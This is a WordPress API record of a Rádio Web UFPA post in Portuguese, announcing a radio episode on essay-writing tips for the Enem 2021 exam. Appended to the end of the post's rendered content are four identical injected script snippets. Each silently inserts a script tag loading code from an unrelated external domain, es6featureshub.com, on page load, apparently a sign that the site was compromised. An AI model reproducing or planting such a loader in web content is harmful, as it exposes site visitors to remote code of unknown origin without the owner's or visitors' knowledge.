{"id":9047,"date":"2021-11-13T00:00:00","date_gmt":"2021-11-13T03:00:00","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=9047"},"modified":"2025-10-21T13:24:23","modified_gmt":"2025-10-21T16:24:23","slug":"revisao-de-redacao-para-o-enem-2021","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/","title":{"rendered":"Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021"},"content":{"rendered":"<!--[if lt IE 9]><script>document.createElement('audio');<\/script><![endif]-->\n\t<div class=\"wp-playlist wp-audio-playlist wp-playlist-light\">\n\t\t\t<div class=\"wp-playlist-current-item\"><\/div>\n\t\t<audio controls=\"controls\" preload=\"none\" width=\"1178\"\n\t\t\t><\/audio>\n\t<div class=\"wp-playlist-next\"><\/div>\n\t<div class=\"wp-playlist-prev\"><\/div>\n\t<noscript>\n\t<ol>\n\t\t<li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/11\/UFPA-NA-MADRUGADA-REVISAO-DE-REDACAO-2021-12-11-21-COMPLETO.mp3.sfk_.mp3'>UFPA na Madrugada - Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021<\/a><\/li>\t<\/ol>\n\t<\/noscript>\n\t<script type=\"application\/json\" class=\"wp-playlist-script\">{\"type\":\"audio\",\"tracklist\":true,\"tracknumbers\":true,\"images\":true,\"artists\":true,\"tracks\":[{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/11\\\/UFPA-NA-MADRUGADA-REVISAO-DE-REDACAO-2021-12-11-21-COMPLETO.mp3.sfk_.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"UFPA na Madrugada - Revis\\u00e3o de Reda\\u00e7\\u00e3o para o Enem 2021\",\"caption\":\"\",\"description\":\"\\\"UFPA NA MADRUGADA - REVIS\\u00c3O DE REDA\\u00c7\\u00c3O 2021 - 12-11-21 - COMPLETO.mp3.sfk\\\". G\\u00eanero: Other.\",\"meta\":{\"artist\":\"R\\u00e1dio Web UFPA\",\"album\":\"UFPA na Madrugada\",\"genre\":\"Other\",\"length_formatted\":\"44:35\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}}]}<\/script>\n<\/div>\n\t\n\n\n<p>Nesta edi\u00e7\u00e3o do UFPA na Madrugada, acompanhe uma revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021. A convidada do programa \u00e9 a professora Ana Vit\u00f3ria Dias Lima, que d\u00e1 aulas de Reda\u00e7\u00e3o no Projeto Universidade Aberta (PUA) e no curso preparat\u00f3rio <a href=\"https:\/\/www.instagram.com\/cursoredacionar\/\">Redacionar<\/a>.<\/p>\n\n\n\n<p>Ao longo do programa, a professora Ana Lima alguns pontos importantes para a prepara\u00e7\u00e3o de um bom texto. Ela afirma que a escrita da reda\u00e7\u00e3o come\u00e7a na leitura e an\u00e1lise dos textos de apoio, que est\u00e3o ali para motivar o aluno, ou seja, suas informa\u00e7\u00f5es n\u00e3o devem ser reescritas na reda\u00e7\u00e3o. No momento de cria\u00e7\u00e3o do texto, o aluno deve mostrar seu repert\u00f3rio de vida, seus conhecimentos em diversas \u00e1reas, seja por meio da cita\u00e7\u00e3o de um filme, m\u00fasica, a legisla\u00e7\u00e3o brasileira ou refer\u00eancias de outras disciplinas. Nesta ocasi\u00e3o a interpreta\u00e7\u00e3o de texto \u00e9 fundamental.<\/p>\n\n\n\n<p>Nesta revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021, Ana Lima destaca tamb\u00e9m como deve ser o planejamento estrutural do texto. A professora explica que o Exame Nacional do Ensino M\u00e9dio cobra a elabora\u00e7\u00e3o de um texto dissertativo-argumentativo, por isso o estudante precisa desenvolver uma tese, abordar as problem\u00e1ticas e propor solu\u00e7\u00f5es para os problemas colocados na discuss\u00e3o.<\/p>\n\n\n\n<p>A professora tamb\u00e9m d\u00e1 dicas sobre como os assuntos que devem ser estudados na prepara\u00e7\u00e3o para a prova, priorizando uma abordagem para os eixos tem\u00e1ticos e o mapeamento sobre as pol\u00edticas p\u00fablicas adotadas no \u00faltimo ano pelo Governo Federal. Logo, \u00e9 necess\u00e1rio dedicar tempo \u00e0 leitura e \u00e0 atualiza\u00e7\u00e3o.<\/p>\n\n\n\n<p>Al\u00e9m disso, a professora Ana Lima fala sobre a import\u00e2ncia do controle emocional nesta reta final de prepara\u00e7\u00e3o. Para ela, estar bem consigo mesmo e com seus familiares, por exemplo, \u00e9 primordial para conter a ansiedade e realizar uma boa prova.<\/p>\n\n\n\n<p>Para conferir os detalhes das dicas da professora Ana Lima nesta revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021, confira a \u00edntegra deste programa. Voc\u00ea tamb\u00e9m pode acompanhar o trabalho da docente pelo perfil <a href=\"https:\/\/www.instagram.com\/cursoredacionar\/\">@cursoredacionar<\/a>.<\/p>\n\n\n\n<p>Apresenta\u00e7\u00e3o: Fabr\u00edcio Queiroz<br>Produ\u00e7\u00e3o e roteiro: Kelly Pinheiro<br>Grava\u00e7\u00e3o e montagem: Denize Ramos<br>Supervis\u00e3o e edi\u00e7\u00e3o: Elissandra Batista e Fabr\u00edcio Queiroz<\/p>\n\n\n\n<p>O UFPA na Madrugada vai ao ar todo s\u00e1bado \u00e0s 00h.<br>Hor\u00e1rios alternativos: Domingo, \u00e0s 21h e ter\u00e7a-feira, \u00e0s 21h<\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/\" aria-label=\"Read more about Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021\">Ler mais<\/a><\/p>\n","protected":false},"author":2,"featured_media":9049,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[675],"tags":[],"class_list":["post-9047","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ufpa-na-madrugada"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021 - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"Nesta Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021, confira dicas sobre a estrutura e a elabora\u00e7\u00e3o do texto dissertativo-argumentativo para a prova.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021 - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"Nesta Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021, confira dicas sobre a estrutura e a elabora\u00e7\u00e3o do texto dissertativo-argumentativo para a prova.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2021-11-13T03:00:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T16:24:23+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/11\/Revisao-Redacao-ENEM-2021.png?fit=1348%2C1347&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"1348\" \/>\n\t<meta property=\"og:image:height\" content=\"1347\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Fabr\u00edcio Queiroz\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Fabr\u00edcio Queiroz\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/\"},\"author\":{\"name\":\"Fabr\u00edcio Queiroz\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\"},\"headline\":\"Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021\",\"datePublished\":\"2021-11-13T03:00:00+00:00\",\"dateModified\":\"2025-10-21T16:24:23+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/\"},\"wordCount\":409,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/11\/Revisao-Redacao-ENEM-2021.png?fit=1348%2C1347&ssl=1\",\"articleSection\":[\"UFPA na Madrugada\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/\",\"name\":\"Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021 - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/11\/Revisao-Redacao-ENEM-2021.png?fit=1348%2C1347&ssl=1\",\"datePublished\":\"2021-11-13T03:00:00+00:00\",\"dateModified\":\"2025-10-21T16:24:23+00:00\",\"description\":\"Nesta Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021, confira dicas sobre a estrutura e a elabora\u00e7\u00e3o do texto dissertativo-argumentativo para a prova.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/11\/Revisao-Redacao-ENEM-2021.png?fit=1348%2C1347&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/11\/Revisao-Redacao-ENEM-2021.png?fit=1348%2C1347&ssl=1\",\"width\":1348,\"height\":1347},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\",\"name\":\"Fabr\u00edcio Queiroz\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"caption\":\"Fabr\u00edcio Queiroz\"},\"description\":\"Editor e Jornalista respons\u00e1vel\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021 - Radio Web UFPA","description":"Nesta Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021, confira dicas sobre a estrutura e a elabora\u00e7\u00e3o do texto dissertativo-argumentativo para a prova.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/","og_locale":"pt_BR","og_type":"article","og_title":"Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021 - Radio Web UFPA","og_description":"Nesta Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021, confira dicas sobre a estrutura e a elabora\u00e7\u00e3o do texto dissertativo-argumentativo para a prova.","og_url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2021-11-13T03:00:00+00:00","article_modified_time":"2025-10-21T16:24:23+00:00","og_image":[{"width":1348,"height":1347,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/11\/Revisao-Redacao-ENEM-2021.png?fit=1348%2C1347&ssl=1","type":"image\/png"}],"author":"Fabr\u00edcio Queiroz","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Fabr\u00edcio Queiroz","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/"},"author":{"name":"Fabr\u00edcio Queiroz","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096"},"headline":"Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021","datePublished":"2021-11-13T03:00:00+00:00","dateModified":"2025-10-21T16:24:23+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/"},"wordCount":409,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/11\/Revisao-Redacao-ENEM-2021.png?fit=1348%2C1347&ssl=1","articleSection":["UFPA na Madrugada"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/","url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/","name":"Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021 - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/11\/Revisao-Redacao-ENEM-2021.png?fit=1348%2C1347&ssl=1","datePublished":"2021-11-13T03:00:00+00:00","dateModified":"2025-10-21T16:24:23+00:00","description":"Nesta Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021, confira dicas sobre a estrutura e a elabora\u00e7\u00e3o do texto dissertativo-argumentativo para a prova.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/11\/Revisao-Redacao-ENEM-2021.png?fit=1348%2C1347&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/11\/Revisao-Redacao-ENEM-2021.png?fit=1348%2C1347&ssl=1","width":1348,"height":1347},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-na-madrugada\/revisao-de-redacao-para-o-enem-2021\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Revis\u00e3o de Reda\u00e7\u00e3o para o Enem 2021"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096","name":"Fabr\u00edcio Queiroz","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","caption":"Fabr\u00edcio Queiroz"},"description":"Editor e Jornalista respons\u00e1vel","url":"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/11\/Revisao-Redacao-ENEM-2021.png?fit=1348%2C1347&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-2lV","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/9047","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=9047"}],"version-history":[{"count":7,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/9047\/revisions"}],"predecessor-version":[{"id":17917,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/9047\/revisions\/17917"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/9049"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=9047"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=9047"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=9047"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}